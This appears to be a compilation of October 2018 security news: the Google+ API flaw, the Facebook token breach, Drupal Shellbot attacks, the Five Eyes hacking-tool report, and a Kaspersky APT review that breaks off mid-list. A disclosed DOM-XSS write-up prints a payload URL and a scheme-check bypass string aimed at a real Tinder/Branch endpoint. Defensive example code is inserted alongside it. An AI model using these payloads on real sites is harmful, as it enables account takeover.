"Google announced that it will be shutting down its controversial social media network Google+ over the next ten months in the wake of a security flaw. This flaw allowed more than 400 apps using the Google+ API to access the personal information of approximately 500,000 users. The flaw was discovered in March, but Google opted not to disclose this vulnerability as it found no evidence that the information had been misused. Additionally, the decision not to disclose the discovered vulnerability speaks to a fear of reputational damage and possible legal ramifications or litigation in light of recent Senate hearings and GDPR.

This type of behavior may become more common among tech companies aiming to protect their reputation in the wake of legislation and privacy laws--they may choose not to disclose vulnerabilities that they are not legally required to report in order to avoid scrutiny or fines. Ultimately it will be up to users to proactively monitor how their data is used and what applications have access to that data by using strong passwords and carefully reviewing access requests prior to using an app like Google+."

Rusty Carter, VP of Product Management, Arxan Technologies:

“This shows yet again that “free” is anything but free. The cost of many of these services is your privacy and your data. In this case, the situation is even worse. Negligence led to more data exposed than intended, and – as the Wall Street Journal reported - Google did not notify users for months about this issue due to fear of disclosure.

While regional legislation may certainly impact how this proceeds, it is clear that consumer awareness of security is increasing quickly and the long term success of businesses will be heavily dependent on their reputation and consumers trust that they are securing and protecting their private and personal information.”

Kevin Whelan, CTO, ITC Secure:

"From a security standpoint, this again highlights the risks of how personal data can be accessed by third parties – in this case names, email addresses, ages, occupations and relationship status were accessible through an open API.

From a business standpoint, it’s also a blow as they have had to close the social network, albeit the average touch time was five seconds and was deemed to be unpopular compared to platforms such as Facebook and Twitter. This bug has been around for a long time, so whilst there’s no evidence that data has been misused, it will require forensic investigation. What’s also surprising here is that Google say that they don’t keep logs for more than two weeks so aren’t able to see what data had been accessed."

Brian Vecci, Technical Evangelist, Varonis:

“This is a breach almost everyone can relate to, because everyone has a Google account and between emails, calendars, documents and other files, lots of people keep a ton of really valuable data in their Google account -- so unauthorised access could be really damaging. On top of that, when you get access to someone’s primary email (which for many people is Gmail), you’ve got the keys to their online life. Not only do you have their login, which is almost always their email, you have the ability to reset any password since password reset links are sent via email. A Gmail breach could be the most damaging breach imaginable for the most number of people the longer it goes undetected. If Google knew about a potential breach and didn’t report it, that’s a huge red flag.

Unlike many other types of accounts, Google serves for many users as the authentication for other apps like Facebook. Last week, Facebook said they had no evidence that linked apps were accessed. But if these linked apps were accessed due to a breach, it could expose all kinds of personal user data. If you’re using Google or Facebook to login to other apps, there is a whole web of information that could be exposed. Breaches like these are the reason why Google, Facebook and other big tech players need to be regulated - they are a gateway to other applications for business and personal use.”


U.S. Senators Demand Internal Memo Related to Google+ Incident
14.10.2018 securityweek
BigBrothers

A group of United States senators on Thursday sent a letter to Google, urging it to provide an internal memo that supposedly explains why the company did not disclose the Google+ data exposure that was discovered in March.

Affecting a Google+ API, the vulnerability provided applications with access to data they were not supposed to access, and up to 500,000 user accounts might have been impacted. The API was apparently exposing user data since 2015.

Google claims it has no evidence of developers being aware of the bug or of account data being misused. However, the Internet giant decided to shut down the Google+ platform, citing low user interest and difficulties in making it successful.

Amid privacy concerns rising from the Facebook-Cambridge Analytica scandal that erupted in March, the search company’s decision to cover up the flaw’s discovery doesn’t sit well with the privacy-conscious. The disclosure also cast a dark shadow over the launch of Google’s new phone, the Pixel 3.

Privacy concerns are what three U.S. senators underline in a letter (PDF) sent to Google chief executive officer Sundar Pichai.

They also question the Internet giant’s decision against a timely disclosure of the data exposure, as well as its willingness to inform the public when it becomes aware of any misuse of the impacted data.

The letter also mentions a Wall Street Journal article that refers to an internal memo at Google detailing the factors that led the company to cover up the issue, such as fears that it would catch the attention of regulators and even draw comparisons to the Facebook privacy scandal.

“Data privacy is an issue of great concern for many Americans who use online services. Particularly in the wake of Cambridge Analytica controversy, customers’ trust in the companies that operate those services to keep their data secure has been shaken,” the letter reads.

“It is for this reason that the reported contents of Google’s internal memo are so troubling. At the same time that Facebook was learning the important lesson that tech firms must be forthright with the public about privacy issues, Google apparently elected to withhold information about a relevant vulnerability for fear of public scrutiny,” the letter continues.

What’s more, the senators mention the fact that, although Pichai testified in front of the Senate Commerce Committee on the issue of privacy only a couple of weeks ago, he did not mention the Google+ issue at the time.

“Google must be more forthcoming with the public and lawmakers if the company is to maintain or regain the trust of the users of its services,” the letter continues.

The senators ask Pichai to provide written responses to questions regarding when and how Google discovered the Google+ issue, why it chose not to disclose it, whether it informed federal agencies of the discovery, and whether there are any other incidents it chose not to disclose, among others.

On top of that, the senators, who urge Google to provide a copy of the internal memo cited in the Wall Street Journal, ask the search company whether users of free Google services “should be afforded the same level of notification and mitigation efforts as paid G Suite subscribers” (Google is apparently committed to inform G Suite users immediately of any incidents involving their data).


Purging Long-Forgotten Online Accounts: Worth the Trouble?
14.10.2018 securityweek
Security
The internet is riddled with long-forgotten accounts on social media, dating apps and various shopping sites used once or twice. Sure, you should delete all those unused logins and passwords. And eat your vegetables. And go to the gym.

But is it even possible to delete your zombie online footprints — or worth your time to do so?

Earlier this month, a little-used social network notified its few users that it will soon shut down. No, not Google Plus; that came five days later, following the disclosure of a bug that exposed data on a half-million people. The earlier shutdown involved Path, created by a former Facebook employee in 2010 as an alternative to Facebook. Then there's Ello sending you monthly emails to remind you that this plucky but little-known social network still exists somehow.

It might not seem like a big deal to have these accounts linger. But with hacking in the news constantly, including a breach affecting 50 million Facebook accounts, you might not want all that data sitting around.

You might not have a choice if it's a service you use regularly. But for those you no longer use, consider a purge. Plus, it might feel good to get your online life in order, the way organizing a closet does.

Take dating apps such as Tinder, long after you found a steady partner or gave up on finding one. You might have deleted Tinder from your phone, but the ghost of your Tinder account is still out there — just not getting any matches, as Tinder shows only "active" users to potential mates.

Or consider Yahoo. Long after many people stopped using it, Yahoo in 2016 suffered the biggest publicly disclosed hack in history, exposing the names, email addresses, birth dates and other information from 3 billion active and dormant accounts. This sort of information is a goldmine for malicious actors looking to steal identities and gain access to financial accounts.

Trouble is, cleaning up your digital past isn't easy.

For one, finding all the old accounts can be a pain. For some of us, it might not even be possible to recall every dating site and every would-be Twitter that never was, not to mention shopping or event ticketing sites you bought one thing from and forgot about.

Then, you'll have to figure out which of your many email accounts you used to log in to a service, then recover passwords and answer annoying security questions — assuming you even remember what your favorite movie or fruit was at the time. Only then might you discover that you can't even delete your account. Yahoo, for instance, didn't allow users to delete accounts or change personally identifying information they shared, such as their birthday, until pressured to do so after the breach.

Even without these hurdles, real life gets in the way. There are probably good reasons you still haven't organized your closet, either.

Perhaps a better approach is to focus on the most sensitive accounts. It might not matter that a news site still has your login, if you never gave it a credit card or other personal details (of course, if you reused your bank password you might be at risk).

Rich Mogull, CEO of data security firm Securosis, said people should think about what information they had provided to services they no longer use and whether that information could be damaging should private posts and messages inadvertently become public.

Dating sites, in particular, can be a trove of potentially damaging information. Once you're in a relationship, delete those accounts.

It's wise to set aside a time each year — maybe after you do your taxes or right after the holidays — to manage old accounts, said Theresa Payton, who runs the security consulting company Fortalice Solutions and served under President George W. Bush as White House chief information officer.

For starters, visit haveibeenpwned.com. This popular tool lets you enter your email addresses and check if it has been compromised in a data breach. Ideally, the attacked company should have notified you already, but that's not guaranteed. Change passwords and close accounts you don't need.

You might also check justdeleteme.xyz, which Payton said could help navigate the "complexities of saying goodbye." The site has a list of common and obscure services. Looking through it might remind you of some of the services you used back in the day. Click on a service for details on how to delete your account.

You might discover that some services simply won't let you go. That could be an oversight from a startup prioritizing other features over a deletion tool. Or, it could be intentional to keep users coming back. There's not much you can do beyond deleting as many posts, photos and other personal data as you can.

What to do with accounts of people who have died is a whole other story. That said, the prospect of the Grim Reaper — and what sorts of information about you may be exposed after you shed this mortal coil — might just be the motivation you need to clean up your online trail.


Ex-NASA Contractor Pleads Guilty in Cyberstalking Scheme
14.10.2018 securityweek
Cyber
A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has pleaded guilty to federal charges.

Twenty-eight-year-old Richard Bauer of Los Angeles entered pleas Thursday to stalking, computer hacking and aggravated identity theft.

Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.

Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.


Facebook Says Hackers Accessed Data of 29 Million Users
14.10.2018 securityweek
Social
Facebook Hack Details

Facebook said Friday that hackers accessed personal data of 29 million users in a breach at the world's leading social network disclosed late last month.

The company had originally said up to 50 million accounts were affected in a cyberattack that exploited a trio of software flaws to steal "access tokens" that enable people to automatically log back onto the platform.

"We now know that fewer people were impacted than we originally thought," Facebook vice president of product management Guy Rosen said in a conference call updating the investigation.

The hackers -- whose identities are still a mystery -- accessed the names, phone numbers and email addresses of 15 million users, he said.

For another 14 million people, the attack was potentially more damaging.

Facebook said cyberattackers accessed that data plus additional information including gender, religion, hometown, birth date and places they had recently "checked in" to as visiting.

No data was accessed in the accounts of the remaining one million people whose "access tokens" were stolen, according to Rosen.

The attack did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Vulnerability in the code

Facebook said engineers discovered a breach on September 25 and had it patched two days later.

That breach allegedly related to a "view as" feature -- described as a privacy tool to let users see how their profiles look to other people. That function has been disabled for the time being as a precaution.

Facebook reset the 50 million accounts believed to have been affected, meaning users would need to sign back in using passwords.

The breach was the latest privacy embarrassment for Facebook, which earlier this year acknowledged that tens of millions of users had their personal data hijacked by Cambridge Analytica, a political firm working for Donald Trump in 2016.

"We face constant attacks from people who want to take over accounts or steal information around the world," chief executive Mark Zuckerberg said on his own Facebook page when the breach was disclosed.

"While I'm glad we found this, fixed the vulnerability, and secured the accounts that may be at risk, the reality is we need to continue developing new tools to prevent this from happening in the first place."

Facebook said it took a precautionary step of resetting "access tokens" for another 40 million accounts which had accessed the "view as" function.

'Seed' accounts

Hackers evidently started the cyber-onslaught on September 14 with 400,000 "seed accounts" they had a hand in or were otherwise close to, according to Rosen.

"The attackers started with a set of accounts they controlled directly, then moved to their friends, and their friend's friends, and so on -- each time taking advantage of the vulnerability," he added.

The exploit allowed hackers to steal copies of access tokens from accounts of "friends" by using the "view as" feature.

Once they had keys to accounts, hackers had the ability to get into them and control them as though they were the real owner.

Hackers could have seen the last four digits of credit card data in people's accounts, with the rest hidden for security, but there was no sign that data was taken, according to Facebook.

Rosen said they had found no reason yet to believe the hackers were interested in people's information; rather, it appeared the mission was to harvest access tokens from friends associated with breached accounts.

He declined to discuss progress regarding figuring out who was behind the attack, saying Facebook had been asked by the FBI to remain quiet on the topic.

The California-based social network says it is cooperating with the FBI, US Federal Trade Commission, Irish Data Protection Commission and other authorities regarding the breach.

Rosen said the FBI investigation also limited what he could disclose about what the hackers' end-goal may have been, but maintained that Facebook had "no reason to believe this attack was related to the mid-term elections" in the US.


Facebook Data Breach Update: attackers accessed data of 29 Million users
13.10.2018 securityaffairs
Social

Facebook data breach – The company provided an update on the data breach it disclosed at the end of September: hackers accessed personal data of 29 million users.
Facebook announced that hackers accessed data of 29 million users, fewer than the 50 million initially thought.

The attack did not affect Facebook-owned Messenger, Messenger Kids, Instagram, WhatsApp, Oculus, Workplace, Pages, payments, third-party apps or advertising or developer accounts, the company said.

Attackers exploited a vulnerability in the “View As” feature, which lets users see how others see their profile, to steal users' Facebook access tokens.

Earlier this month Facebook revealed that attackers chained three bugs to breach the Facebook platform.

“We now know that fewer people were impacted than we originally thought,” said Facebook vice president of product management Guy Rosen in a conference call.

Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.

For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.

The hackers started on September 14 with 400,000 “seed accounts” they controlled directly and then expanded their activity to those accounts' networks.

“First, the attackers already controlled a set of accounts, which were connected to Facebook friends. They used an automated technique to move from account to account so they could steal the access tokens of those friends, and for friends of those friends, and so on, totaling about 400,000 people.” Rosen added.

“In the process, however, this technique automatically loaded those accounts’ Facebook profiles, mirroring what these 400,000 people would have seen when looking at their own profiles. That includes posts on their timelines, their lists of friends, Groups they are members of, and the names of recent Messenger conversations. Message content was not available to the attackers, with one exception. If a person in this group was a Page admin whose Page had received a message from someone on Facebook, the content of that message was available to the attackers.”

Facebook is cooperating with the US authorities, the Irish Data Protection Commission and other authorities regarding the breach.

Rosen confirmed Facebook had “no reason to believe this attack was related to the mid-term elections” in the US.


DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and More
13.10.2018 securityaffairs
Vulnerability

Our team of security researchers was researching the client-side security of dating apps, and one of the main focus targets was the social search mobile app Tinder.
After initial reconnaissance steps were done, a Tinder domain with multiple client-side security issues was found – meaning hackers could have access to users’ profiles and details.

Immediately after finding these vulnerabilities, we contacted Tinder via their responsible disclosure program and started working with them.

We learned that the vulnerable endpoint isn’t owned by Tinder, but by branch.io, an attribution platform used by many big corporations around the globe. The Tinder security team helped us get in touch with them, and accordingly, they’ve put out a timely patch.

Digging deeper, we found out many big websites were sharing the vulnerable endpoint in their code and domains, including Shopify, Yelp, Western Union, and Imgur. This means that as many as 685 million users could be at risk.

While the flaw has already been fixed, if you have recently used Tinder or any of the other affected sites, we recommend checking to make sure your account hasn’t been compromised. It’s a good idea to change your password ASAP.

Details:
DOM-based XSS vulnerability, also known as “type-0 XSS”, is a class of cross-site scripting vulnerability that appears within the DOM. It is a type of attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim’s browser, typically in a dynamic page. In DOM-based XSS, the HTML source code and the response of the attack are exactly the same. This means the malicious payload cannot be found in the response, making it extremely difficult for browser built-in XSS mitigation features like Chrome’s XSS Auditor to detect it.

Can you spot the vulnerabilities?

Tinder

The fact that branch.io wasn’t using CSP made these vulnerabilities easy to exploit in any browser we like.

1. DOM XSS
For example, our initial finding was that the endpoint https://go.tinder.com/amp-iframe-redirect was prone to multiple vulnerabilities (the scheme_redirect and redirect_strategy GET parameters control the div content).

redirect_strategy is “INJECTIONA” and scheme_redirect is “INJECTIONB” from the code above.

This meant that by modifying redirect_strategy to a DOM XSS payload, it was possible to execute client-side code in the context of a Tinder domain in any browser:
https://go.tinder.com/amp-iframe-redirect?scheme_redirect=http://google.com&redirect_strategy=1)%7B%0Aalert(1)%3B//
will render in the DOM as:

if (1){ alert(1);// && "INJECTIONA") {
    var parser = document.createElement('a');
    parser.href = "INJECTIONA";
    var protocol = parser.protocol.toLowerCase();

Tinder

2. validateProtocol() and validate() Bypass
Also notice how validateProtocol() uses indexOf to check the schemes – the indexOf() method returns the position of the first occurrence of a specified value in a string, or -1 if the value never occurs. However, it can be tricked by using javascript://%0aalert(0)//good.com/https:// — both validate functions can be bypassed because indexOf will find “https://”.

var parser = document.createElement('a');
parser.href = url;
var protocol = parser.protocol.toLowerCase();
if (('javascript:', 'vbscript:', 'data:').indexOf(protocol) < 0) {
    return url;
}
...
return null;

if (['http:', 'https:'].indexOf(protocol) < 0) {
    window.top.location = validate("http://google.com");
}
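The bypass above works because a substring search accepts any string that happens to contain "https://", while the script trusts the parsed scheme. The following added example (not Branch.io's or Tinder's code) puts a hypothetical substring-based validator of that kind next to a hardened one that parses the URL first and allowlists the scheme; TRUSTED_FALLBACK and the function names are assumptions, and the bypass string is the one quoted in the write-up.

```javascript
// Added example, not Branch.io's or Tinder's code. It contrasts a substring
// scheme check of the kind described above with a parse-then-allowlist check.

// Constructed placeholder for the trusted page a redirect falls back to.
const TRUSTED_FALLBACK = 'https://example.com/';

// Hypothetical weak validator: it only asks whether "http://" or "https://"
// occurs somewhere in the raw string, so a javascript: URL that merely
// contains "https://" further along is accepted as a redirect target.
function weakValidate(url) {
  if (url.indexOf('http://') >= 0 || url.indexOf('https://') >= 0) {
    return url;
  }
  return null;
}

// Hardened validator: let the WHATWG URL parser decide what the scheme is
// (it strips leading whitespace and lower-cases the scheme), then compare the
// parsed scheme with an allowlist. Relative or malformed input throws inside
// the parser and is also sent to the fallback.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function safeRedirectTarget(url) {
  let parsed;
  try {
    parsed = new URL(String(url));
  } catch (err) {
    return TRUSTED_FALLBACK;
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol.toLowerCase())) {
    return TRUSTED_FALLBACK;
  }
  return parsed.href; // normalized absolute URL
}

// The bypass string quoted in the write-up above.
const BYPASS = 'javascript://%0aalert(0)//good.com/https://';

// Run both validators over the bypass string so the difference is visible.
function demo() {
  return {
    weak: weakValidate(BYPASS),           // the raw string passes the weak check
    hardened: safeRedirectTarget(BYPASS), // falls back to the trusted page
  };
}
```

Scheme validation only fixes the second bug; the first one (redirect_strategy spliced into an if statement) is avoided by never interpolating request parameters into inline script and by shipping a CSP, as the write-up notes.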

So, how did this bug affect more than Tinder?
go.tinder.com is an alias for custom.bnc.lt, a Branch.io resource. And many other companies have their alias pointing to it.

To name a few websites affected by this vulnerability: RobinHood, Shopify, Canva, Yelp, Western Union, Letgo, Cuvva, imgur, Lookout, fair.com and more.

Thanks to the fast response we got from Branch’s security team, this vulnerability has now been fixed for everyone’s domains.


Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
13.10.2018 securityaffairs
Vulnerability  Virus

A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year to install a backdoor on compromised servers.
Security experts from IBM observed attackers targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the infected systems and take full control of the hosted platforms.

According to the IBM experts, this latest wave of attacks is conducted by financially motivated hackers who exploit the lack of patch management on many Drupal websites.

“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.

“This appears to be a financially motivated effort to mass-compromise websites.”

The experts observed a large number of HTTP POST requests being sent from the same IP address as part of a widespread cyber-attack. The requests were used by the attackers to download a Perl script that launches the Shellbot backdoor, which uses an Internet Relay Chat (IRC) channel as C&C.

Drupal attacks

The bot included multiple tools to carry out distributed denial-of-service (DDoS) attacks and scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.

The bot was designed to automate scanning a large number of websites and fully compromise the vulnerable ones.

Experts pointed out that the Shellbot code first appeared in 2005 and is used by several threat groups; it was also used in the massive crypto-mining campaign that exploited the Apache Struts vulnerability CVE-2017-5638 in March 2017.

“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.


Five Eyes Intelligence agencies warn of popular hacking tools
13.10.2018 securityaffairs
BigBrothers

Security agencies belonging to Five Eyes (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report that details some popular hacking tools.
Experts from the cybersecurity agencies of the Five Eyes intelligence alliance have issued a report that provides technical details on the most popular hacking tool families and on how to detect and neutralize attacks involving them.

The report was prepared with contributions from researchers at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

“This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.” reads the report published by the experts.

“In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:

Remote Access Trojan: JBiFrost
Webshell: China Chopper
Credential Stealer: Mimikatz
Lateral Movement Framework: PowerShell Empire
C2 Obfuscation and Exfiltration: HUC Packet Transmitter
To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.”

The report provides technical details on remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C&C) obfuscators.

The experts analyzed the JBiFrost RAT, a variant of the Adwind backdoor, which has been used by attackers of almost every kind, from nation-state hackers to low-skilled crooks.

“JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.” states the report.

“JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.”

The report also describes the popular post-exploitation tool Mimikatz, used by many threat actors, and the lateral movement framework PowerShell Empire; the latter is used by attackers to elevate privileges, harvest credentials, find nearby hosts, and move laterally across the target network.

The experts at Five Eyes agencies also detailed the China Chopper web shell, a code injection web shell that executes Microsoft .NET code within HTTP POST commands.

China Chopper is a tiny shell (4K) widely used in attacks in the wild since 2012; earlier this year the China-linked APT group Leviathan, aka TEMP.Periscope, used it in attacks on engineering and maritime entities.

Another hacking tool described in the report is HUC Packet Transmitter (HTran), which attackers can use to obfuscate communications with the intent of bypassing security controls and evading detection.

“The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.” states the report.

“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.

The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.”


Fitmetrix fitness software company may have exposed millions of customer records
13.10.2018 securityaffairs
Incident

Fitmetrix fitness software company exposed customer data online: a 119GB archive containing name, gender, email address, birth date, height, weight and more.
The fitness software company Fitmetrix may have exposed a database hosted on AWS containing millions of customer records. The exposed records included name, gender, email address, birth date, home and work phone, height, weight and much more.

The huge trove of data was discovered by the expert Bob Diachenko using a simple Shodan query for unsecured Elasticsearch installs.

Fitmetrix

The expert discovered a 119GB archive exposed by Fitmetrix in cloud storage; he noticed two sets of data, one of which was labeled “compromised” and contained a ransom note.

“On October 5th, a member of Hacken security team has been browsing through Shodan looking for exposed Elasticsearch instances which recently could become targets in another spread of ransomware campaigns.” reads a blog post published by Diachenko.

“It appears that the attackers are using a script that automates the process of accessing a database, possibly exporting it, deleting the database, and then creating the ransom note. This script sometimes fails and the data is still available to the user even though a ransom note is created.”

The database includes daily FitMetrix platform audit data in the period between July 15th and Sept 19th 2018. The total number of records in ‘platformaudit’ indexes was 122,869,970, not all containing customer data.

Diachenko estimated that “millions” of other accounts were still likely to have been affected.

Mindbody, which owns FitMetrix, secured the database on October 10, five days after it was informed of the data leak.


Threats in the Netherlands
13.10.2018 Kaspersky
APT
Advanced threat actors and other malicious cyber activity
Introduction
On October 4, 2018, the MIVD held a press conference about an intercepted cyberattack on the OPCW in the Netherlands, allegedly by the advanced threat actor Sofacy (also known as APT28 or Fancy Bear, among others). According to the MIVD, four suspects were caught red-handed trying to break into the OPCW’s network. Sofacy activity in the Netherlands did not come as a surprise to us, since we have seen signs of its presence in that country before. However, aside from Sofacy we haven’t seen many other advanced persistent threat (APT) groups in the Netherlands, at least when compared to other areas, such as the Middle East. Upon further reflection, we have concluded that this is rather odd. There are quite a few big multinationals and some high tech companies located in the Netherlands. In addition, there are other potential strategic targets for threat actors. So we decided to review cyber-threat activity targeting or affecting the Netherlands.

Providing an overview of one APT’s activity can be quite difficult, let alone all the APT activity affecting a country. First, we only see what we can see. That means we can only gather data from sources we have access to, such as that shared voluntarily by our customers with Kaspersky Security Network (KSN), and those sources also need to be supplied with data related to a specific APT. As a result, like any other cybersecurity vendor, our telemetry is naturally incomplete.

One way to improve our overview is to use sinkhole data. When a domain that is used by an APT expires, researchers can register that domain and direct the traffic to a sinkhole server. This is done quite frequently. For many of the APTs we track, we sinkhole at least one domain. In comparison to other sources, such as KSN and multi-scanner services, sinkhole data has a number of advantages. For example, in some cases you can get a better overview of the victimology of the APT. The drawback is that we need to filter the results, since there can be quite a few false positives (e.g. because other researchers are investigating the malware). This filtering can be quite cumbersome, because if we base it solely on the IP and the requests, it is quite difficult to come to a verdict.

Methodology
For this blogpost we gathered all the sinkhole data for Dutch IPs in the last four years (September 2014 to September 2018), which amounts to around 85,000 entries. Of course, this is far too much to verify by hand, so the first step was to filter the results, and especially all the scanners. While some of these were relatively easy to spot and filter out (e.g. all the TOR exit nodes, all the Romanian.anti-sec scanner hits), others required a bit more effort.

In order to filter out the scanners, we deleted all entries where the IP matched more than four “tags” (each tag stands for a different campaign). After doing this, we were left with around 11,000. That meant 77% fewer results, but there were still too many, so we applied some more aggressive filtering.

The table below gives the number of IPs by how many tags they hit:

Tags hit   IPs
0          10,532
1          1,149
2          618
3          344
4          234
>4         938
One way to determine whether a hit in the sinkhole database is a true positive (TP) or a false positive (FP) is to find out who the victim is. We thus did a reverse DNS lookup on each IP and checked whether, at the time of the first entry in our sinkhole database, the DNS entry matched the entries in our passive DNS database. If this was not the case, the entry was ignored. The next step was to remove all the entries that would be difficult to investigate (e.g. IP addresses that belong to an ADSL connection). Even though this method was quite rigid and meant that some TPs might be missed, we still decided to use it, since we knew it would be too resource-intensive to investigate all the entries. The result: only around 1,000 entries remained for investigation.

The aim of this blogpost is to give an overview of which APT groups are active in the Netherlands and what they are interested in, and that requires TPs, not FPs. For each remaining entry, a reverse DNS lookup was made, and the ASN information was saved. This was checked against our passive DNS database to see whether this IP had the same domain as its first entry in the sinkhole database. If it did, the entry was kept; if it did not, we tried to find out to which organization the IP belonged.

At this point, for the entries that remained, the raw requests were retrieved and compared against the template request made by the APT’s malware. Finally, for each of the IPs left on our list, we tried to tie them to a company or institution. If this succeeded, the entry was kept and marked as a TP.

We also checked our APT reports for targets in the Netherlands and added these results to the review.
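The filtering steps above, written out as an added example over constructed data (this is not Kaspersky’s pipeline, sinkhole data or passive-DNS data; the IPs are documentation ranges, and the host names, the “more than four tags” cutoff and the access-line name pattern are assumptions made for the illustration):

```python
"""Sinkhole triage: tag histogram, scanner removal, passive-DNS agreement, access-line drop.

Added example over constructed data; not Kaspersky's tooling or telemetry.
"""
import re
from collections import defaultdict

# Constructed sinkhole hits: (source IP, campaign tag, rDNS name seen at the first hit).
SINKHOLE_HITS = [
    ("198.51.100.7",  "sofacy",   "gw.example-ministry.nl"),
    ("198.51.100.7",  "sofacy",   "gw.example-ministry.nl"),
    ("198.51.100.20", "turla",    "mx.example-multinational.nl"),
    ("198.51.100.20", "gatak",    "mx.example-multinational.nl"),
    ("203.0.113.5",   "sofacy",   "scanner.example-research.net"),   # hits five campaigns: a scanner
    ("203.0.113.5",   "turla",    "scanner.example-research.net"),
    ("203.0.113.5",   "lamberts", "scanner.example-research.net"),
    ("203.0.113.5",   "buhtrap",  "scanner.example-research.net"),
    ("203.0.113.5",   "hades",    "scanner.example-research.net"),
    ("192.0.2.33",    "lamberts", "ip-192-0-2-33.adsl.example-isp.nl"),  # consumer access line
    ("192.0.2.60",    "turla",    "old-name.example.nl"),                # rDNS disagrees with pDNS
]

# Constructed passive-DNS view: IP -> names that resolved to it around the first hit.
PASSIVE_DNS = {
    "198.51.100.7":  {"gw.example-ministry.nl"},
    "198.51.100.20": {"mx.example-multinational.nl", "www.example-multinational.nl"},
    "203.0.113.5":   {"scanner.example-research.net"},
    "192.0.2.33":    {"ip-192-0-2-33.adsl.example-isp.nl"},
    "192.0.2.60":    {"new-name.example.nl"},
}

SCANNER_TAG_LIMIT = 4   # more than four distinct campaign tags -> treat the IP as a scanner
# Assumed naming pattern for dial-up/DSL/cable pools that are not worth investigating.
ACCESS_LINE = re.compile(r"\b(adsl|dsl|dyn|dynamic|pool|cable)\b", re.I)


def tags_per_ip(hits):
    """Distinct campaign tags hit by each source IP."""
    tags = defaultdict(set)
    for ip, tag, _ in hits:
        tags[ip].add(tag)
    return {ip: len(t) for ip, t in tags.items()}


def tag_histogram(hits):
    """Bucket IPs by distinct-tag count the way the table above does (0..4 and '>4')."""
    hist = {"0": 0, "1": 0, "2": 0, "3": 0, "4": 0, ">4": 0}
    for n in tags_per_ip(hits).values():
        hist[str(n) if n <= 4 else ">4"] += 1
    return hist


def triage(hits, passive_dns):
    """Return the IPs that survive all three filters, with the tags seen for each."""
    counts = tags_per_ip(hits)
    kept = defaultdict(set)
    for ip, tag, rdns in hits:
        if counts[ip] > SCANNER_TAG_LIMIT:
            continue                                  # step 1: scanner, too many campaigns
        if rdns not in passive_dns.get(ip, set()):
            continue                                  # step 2: rDNS at first sight != passive DNS
        if ACCESS_LINE.search(rdns):
            continue                                  # step 3: access line, hard to investigate
        kept[ip].add(tag)
    return {ip: sorted(t) for ip, t in kept.items()}


if __name__ == "__main__":
    print(tag_histogram(SINKHOLE_HITS))
    print(triage(SINKHOLE_HITS, PASSIVE_DNS))
```

The surviving entries are the ones the text goes on to tie to an organization by hand; everything dropped here is dropped for a reason the write-up names, so the same filters can be re-run with a different tag cutoff when the false-positive load changes.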

Results
Using the methods described above, we found the following APTs that are or have been active in the Netherlands:

BlackOasis
BlackOasis is an APT group we have been tracking since May 2016. It uses the commercially available FinFisher malware made by Gamma International and sold to law enforcement agencies (LEAs) and nation states. BlackOasis differentiates itself from other APT-groups by using a vast amount of 0-days: at least five since 2015. Victims are mostly found in Middle Eastern countries, where the group is particularly interested in politics. We have also seen it targeting members of the United Nations and regional news correspondents. Recently we have seen a shift in focus towards other countries such as Russia, the UK and now also the Netherlands. Its Dutch victims fit into its shift of interest.

Sofacy
